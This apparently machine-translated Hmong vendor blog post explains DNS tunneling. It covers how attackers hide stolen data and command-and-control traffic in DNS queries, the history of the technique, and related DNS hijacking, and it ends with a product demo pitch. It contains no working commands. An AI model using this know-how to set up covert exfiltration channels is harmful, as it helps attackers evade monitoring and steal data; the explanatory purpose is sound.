DNS tunneling hloov lub npe sau npe rau hauv riam phom rau hackers. DNS yog qhov tseem ceeb hauv Internet phau ntawv xov tooj loj. DNS kuj tseem yog cov txheej txheem hauv qab uas tso cai rau cov thawj coj los nug DNS server database. Txog tam sim no txhua yam zoo li meej. Tab sis cunning hackers pom tau hais tias lawv tuaj yeem zais kev sib txuas lus nrog cov neeg raug tsim txom lub computer los ntawm kev txhaj tshuaj tswj cov lus txib thiab cov ntaub ntawv rau hauv DNS raws tu qauv. Lub tswv yim no yog lub hauv paus ntawm DNS tunneling.
Yuav ua li cas DNS tunneling ua haujlwm
Txhua yam hauv Is Taws Nem muaj nws tus kheej cov txheej txheem cais. Thiab kev txhawb nqa DNS yog qhov yooj yim raws tu qauv thov teb hom. Yog tias koj xav pom nws ua haujlwm li cas, koj tuaj yeem khiav nslookup, lub cuab yeej tseem ceeb rau kev ua cov lus nug DNS. Koj tuaj yeem thov qhov chaw nyob los ntawm kev qhia meej lub npe koj nyiam, piv txwv li:
Hauv peb qhov xwm txheej, cov txheej txheem tau teb nrog qhov chaw nyob IP. Hais txog DNS raws tu qauv, kuv tau thov qhov chaw nyob lossis hu ua kev thov. "A" hom. Muaj lwm hom kev thov, thiab DNS raws tu qauv yuav teb nrog cov txheej txheem sib txawv ntawm cov ntaub ntawv, uas, raws li peb yuav pom tom qab, tuaj yeem siv los ntawm hackers.
Ib txoj hauv kev los yog lwm qhov, ntawm nws qhov tseem ceeb, DNS raws tu qauv muaj kev txhawj xeeb nrog kev xa cov lus thov mus rau tus neeg rau zaub mov thiab nws cov lus teb rov qab rau tus neeg siv khoom. Yuav ua li cas yog tias tus neeg tawm tsam ntxiv cov lus zais hauv lub npe sau npe thov? Piv txwv li, tsis txhob nkag mus rau qhov URL uas raug cai, nws yuav nkag mus rau cov ntaub ntawv nws xav xa mus:
Cia peb hais tias tus neeg tawm tsam tswj hwm DNS server. Nws tuaj yeem xa cov ntaub ntawv-cov ntaub ntawv tus kheej, piv txwv li-tsis tas yuav raug kuaj pom. Tom qab tag nrho, vim li cas cov lus nug DNS dheev dhau los ua ib yam dab tsi tsis raug cai?
Los ntawm kev tswj hwm tus neeg rau zaub mov, hackers tuaj yeem tsim cov lus teb thiab xa cov ntaub ntawv rov qab mus rau lub hom phiaj. Qhov no tso cai rau lawv hla cov lus zais hauv ntau qhov chaw ntawm DNS teb rau cov malware ntawm lub tshuab muaj kab mob, nrog rau cov lus qhia xws li kev tshawb nrhiav hauv cov ntawv tshwj xeeb.
Qhov "tunneling" ntawm qhov kev tawm tsam no yog zais cia cov ntaub ntawv thiab cov lus txib los ntawm kev tshawb nrhiav los ntawm kev saib xyuas cov tshuab. Hackers tuaj yeem siv base32, base64, thiab lwm yam. cim teeb, lossis txawm tias encrypt cov ntaub ntawv. Xws li encoding yuav dhau undetected los ntawm yooj yim kev hem thawj utilities uas tshawb nrhiav cov ntsiab lus.
Thiab qhov no yog DNS tunneling!
Keeb kwm ntawm DNS tunneling tawm tsam
Txhua yam muaj qhov pib, suav nrog lub tswv yim ntawm kev nyiag DNS raws tu qauv rau hacking lub hom phiaj. Raws li peb tuaj yeem qhia, thawj kev sib sab laj Qhov kev tawm tsam no tau ua los ntawm Oskar Pearson ntawm Bugtraq mailing list nyob rau lub Plaub Hlis 1998.
Los ntawm 2004, DNS tunneling tau qhia ntawm Black Hat raws li cov txheej txheem hacking hauv kev nthuav qhia los ntawm Dan Kaminsky. Yog li, lub tswv yim sai sai tau loj hlob mus rau hauv lub cuab yeej tawm tsam tiag.
Niaj hnub no, DNS tunneling occupies ib txoj hauj lwm ntseeg siab ntawm daim ntawv qhia muaj peev xwm hem (thiab cov ntaub ntawv kev ruaj ntseg bloggers feem ntau hais kom piav qhia nws).
Koj puas tau hnov txog Dej Hiav Txwv ? Qhov no yog ib qho kev sib tw tsis tu ncua los ntawm cybercriminal pawg-feem ntau yuav yog lub xeev-sponsored-rau nyiag DNS servers raug cai txhawm rau hloov pauv DNS thov rau lawv tus kheej servers. Qhov no txhais tau hais tias cov koom haum yuav tau txais IP chaw nyob "tsis zoo" taw qhia rau cov nplooj ntawv cuav uas khiav los ntawm hackers, xws li Google lossis FedEx. Nyob rau tib lub sijhawm, cov neeg tawm tsam yuav tuaj yeem tau txais cov neeg siv nyiaj thiab cov passwords, leej twg yuav nkag mus rau lawv ntawm qhov chaw cuav. Qhov no tsis yog DNS tunneling, tab sis tsuas yog lwm qhov tsis zoo ntawm hackers tswj DNS servers.
DNS tunneling kev hem thawj
DNS tunneling yog zoo li qhov taw qhia ntawm qhov pib ntawm theem xov xwm phem. Qhov twg? Peb twb tau tham txog ntau yam, tab sis cia peb tsim lawv:
Cov ntaub ntawv tso zis (exfiltration) - ib tug hacker zais xa cov ntaub ntawv tseem ceeb tshaj DNS. Qhov no yeej tsis yog txoj hauv kev zoo tshaj plaws los hloov cov ntaub ntawv los ntawm cov neeg raug tsim txom lub computer - noj rau hauv tus account tag nrho cov nqi thiab encodings - tab sis nws ua haujlwm, thiab tib lub sijhawm - zais cia!
Hais kom ua thiab tswj (ua luv C2) - hackers siv DNS raws tu qauv xa yooj yim tswj commands los ntawm, hais, remote access trojan (Kev nkag mus rau tej thaj chaw deb Trojan, abbreviated RAT).
IP-Over-DNS Tunneling - Qhov no yuav zoo li vwm, tab sis muaj cov khoom siv hluav taws xob uas siv IP pawg nyob rau sab saum toj ntawm DNS raws tu qauv thov thiab cov lus teb. Nws ua rau cov ntaub ntawv hloov pauv siv FTP, Netcat, ssh, thiab lwm yam. ib txoj hauj lwm yooj yim. ominous heev!
Q: tunneling yog dab tsi? Hais txog: Nws tsuas yog ib txoj hauv kev los hloov cov ntaub ntawv hla tus txheej txheem uas twb muaj lawm. Cov txheej txheem hauv qab no muab cov channel tshwj xeeb lossis qhov, uas yog siv los zais cov ntaub ntawv tiag tiag raug xa mus.
Q: Thaum twg yog thawj DNS tunneling nres ua tiav? Hais txog: Peb tsis paub! Yog koj paub, thov qhia rau peb paub. Rau qhov zoo tshaj plaws ntawm peb txoj kev paub, thawj qhov kev sib tham ntawm kev tawm tsam tau pib los ntawm Oscar Piersan hauv Bugtraq mailing list nyob rau lub Plaub Hlis 1998.
Q: Dab tsi tawm tsam zoo ib yam li DNS tunneling? Hais txog: DNS yog nyob deb ntawm tib txoj cai uas tuaj yeem siv rau tunneling. Piv txwv li, hais kom ua thiab tswj (C2) malware feem ntau siv HTTP los npog cov kev sib txuas lus. Raws li nrog DNS tunneling, tus hacker zais nws cov ntaub ntawv, tab sis qhov no nws zoo li kev khiav tsheb los ntawm lub vev xaib niaj hnub nkag mus rau thaj chaw deb (tswj los ntawm tus neeg tawm tsam). Qhov no tuaj yeem tsis pom los ntawm kev saib xyuas cov haujlwm yog tias lawv tsis tau teeb tsa kom pom tau hem kev tsim txom ntawm HTTP raws tu qauv rau hacker lub hom phiaj.
Koj puas xav kom peb pab nrog DNS qhov nrhiav kom pom? Mus saib peb lub module Varonis Ntug thiab sim nws dawb demo!